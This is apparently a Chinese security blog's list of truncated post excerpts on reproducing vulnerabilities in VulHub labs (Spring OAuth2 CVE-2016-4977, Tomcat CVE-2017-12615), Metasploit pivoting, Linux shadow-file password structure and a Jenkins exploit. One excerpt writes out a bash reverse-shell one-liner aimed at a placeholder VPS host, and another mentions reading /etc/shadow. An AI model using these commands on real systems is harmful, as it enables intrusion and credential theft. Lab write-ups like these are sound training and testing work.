CVE-2016-4977 Spring Security OAuth2 远程命令执行漏洞 环境搭建 使用VulHub搭建漏洞环境，进入/spring/CVE-2016-4977目录，下发以下命令启动环境 sudo service docker start //若没启动docker先启动服务 docker-compose up -d 访问 http…

XML语法 XML(eXtensible Markup Language),可扩展标记语言，用来定义结构、存储和传输数据，它的设计宗旨时传输数据，而HTML用来表现数据。XML被设计为具有自我描述性，要自己发明标签，没有预定义标签。而HTML只能使用标准中定义的标签。 一个典型的XML文档如下： <!-- XML声明表述了文档的一些信息--&…

CVE-2017-12615 环境搭建 使用VulHub搭建漏洞环境，进入/tomcat/CVE-2017-12615目录，下发以下命令启动环境 sudo service docker start //若没启动docker先启动服务 docker-compose up -d 访问 http://ip:8080/，如图所示环境搭建成功 漏洞复现 漏洞…

实验环境: 攻击机：kali 192.168.144.217 靶 机: 外网机： 外网网卡：192.168.144.147 内网网卡：192.168.52.143 域控：192.168.52.138 内网机win7：192.168.52.99 Metasploit内网代理 在已获得外网机shell的情况下，上传msf马反弹会话 msfvenom -…

首先了解下linux系统密码的构成。以root权限下发cat /etc/shadow,用户名之后的第两个冒号之间是密码。密码由三部分组成。第一部分，前两个$符之间是加密方式，其中1代表是MD5加密，5代表SHA256加密，6代表SHA512加密。第二部分，后两个$之间是盐值。第三部分，第三个$之后为密码。 import crypt crypt.cr…

Bash反弹 1.在vps上新建文件，写入bash反弹shell一句话，并起web服务。 #bash反弹shell一句话 vim poc: bash -i >& /dev/tcp/vpsip/port 0>&1 #起web服务 Pyhto3 -m http.server 8080 2.下载poc到Jenkins服务器 p…